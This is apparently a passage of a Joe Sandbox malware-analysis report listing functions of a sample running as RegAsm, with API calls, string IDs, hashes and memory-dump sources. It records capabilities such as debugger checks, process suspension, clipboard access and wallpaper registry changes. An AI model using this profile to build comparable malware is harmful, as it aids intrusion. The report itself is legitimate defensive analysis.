                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                                                                                                                                                                  Function 0041CA73 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                                                                                                                    • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                                                                                                                                    • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                                                                                                                                                                    • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?), ref: 004137EC
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                                                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                                                                  • API String ID: 4127273184-3576401099
                                                                                                                                                                                                  • Opcode ID: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                                                                                                                                                                  • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                                                                                                                                                                  Function 0043BB71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 3906539128-2084328917
                                                                                                                                                                                                  • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                                                                                                                                  • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                                                                                                                                                                  Function 00451D58 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 236COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 1661935332-2084328917
                                                                                                                                                                                                  • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                                                                                                                                                  • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                                                                                                                                                                  Function 0044E8F9 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: .$t'`/
                                                                                                                                                                                                  • API String ID: 0-810986392
                                                                                                                                                                                                  • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                                                                                                                                                  • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                                                                                                                                                                                  Function 0045201B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                  • String ID: p'E$JD
                                                                                                                                                                                                  • API String ID: 1084509184-908320845
                                                                                                                                                                                                  • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                                                                                                                                                  • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                                                                                                                                                                  Function 0044896D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                  • String ID: GetLocaleInfoEx$t'`/
                                                                                                                                                                                                  • API String ID: 2299586839-1519066704
                                                                                                                                                                                                  • Opcode ID: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                                                                                                                                                                  • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                                                                                                                                                                  Function 100060E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                  • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                                                                                  • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                                                                                                                                  Function 10004AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                  • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                                                  • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                                                                                                                  Function 00443355 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0044338F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                  • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                                                                                                                                  • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                                                                                                                                                                  Function 0040B749 Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Clipboard$CloseDataOpen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2058664381-0
                                                                                                                                                                                                  • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                                                                                                                                  • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                                                                                                                                                                  Function 0041BBC6 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                                                                                                                                                                                  • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041BBE7
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CloseHandleOpenResume
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3614150671-0
                                                                                                                                                                                                  • Opcode ID: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                                                                                                                                                  • Instruction ID: 00af7d86c2812e48088786baf9e1e683bef33431c8858657b58e82835f0f92e7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AD05E36204121E3C220176A7C0CD97AD68DBC5AA2705412AF804C22609A60CC0186E4
                                                                                                                                                                                                  Function 0041BB9A Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                                                                                                                                                                                                  • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041BBBB
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CloseHandleOpenSuspend
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1999457699-0
                                                                                                                                                                                                  • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                                                                                                                                                  • Instruction ID: 611eda4fe747f1c58df557fb912083c2b4b70512fbfbfb6239720577e9304ccf
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98D05E36204121E3C7211B6A7C0CD97AD68DFC5AA2705412AF804D26549A20CC0186E4
                                                                                                                                                                                                  Function 00434CB6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                                                                                                  • String ID: MZ@
                                                                                                                                                                                                  • API String ID: 2325560087-2978689999
                                                                                                                                                                                                  • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                                                                                                                                  • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                                                                                                                                                                  Function 10006580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: .
                                                                                                                                                                                                  • API String ID: 0-248832578
                                                                                                                                                                                                  • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                                                                                  • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                                                                                                                                                                  Function 00452393 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 1663032902-2084328917
                                                                                                                                                                                                  • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                                                                                                                                  • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                                                                                                                                                                  Function 004520B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
